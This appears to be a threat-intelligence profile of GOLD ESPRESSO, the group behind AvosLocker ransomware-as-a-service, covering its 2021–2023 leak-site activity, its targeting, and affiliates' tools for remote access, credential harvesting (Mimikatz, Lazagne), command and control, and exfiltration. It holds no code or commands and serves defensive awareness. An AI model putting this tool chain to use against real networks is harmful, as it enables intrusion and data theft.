GOLD ESPRESSO

GOLD ESPRESSO was a financially motivated cybercrime group that operated the AvosLocker name-and-shame ransomware-as-a-service (RaaS). The threat group provided hosting for stolen data and conducted negotiations on behalf of its affiliates. GOLD ESPRESSO began posting victim names to its leak site in July 2021 and continued to do so until May 2023, when the group ceased naming victims. A persona responsible for recruiting affiliates on the Ramp underground forum last posted to it in January 2023.

AvosLocker was deployed against organizations in multiple sectors, including critical infrastructure across the United States and Canada. The group were observed seeking network access to companies with a revenue of over 50 million USD on underground forums.

Tactics, techniques and procedures (TTP) related to the deployment of AvosLocker varied between GOLD ESPRESSO’s affiliates. CTU researchers observed affiliates gaining initial access to victim networks via scan and exploit techniques. The U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) reported affiliates using a variety of open-source and legitimate tools to conduct AvosLocker operations. These included Splashtop Streamer, AnyDesk and Atera Agent for remote access, the native Windows PsExec tool for execution, the Ligolo and Chisel tunneling tools, Lazagne and Mimikatz for harvesting credentials, the Cobalt Strike and Sliver frameworks for command and control (C2), and FileZilla and Rclone for data exfiltration.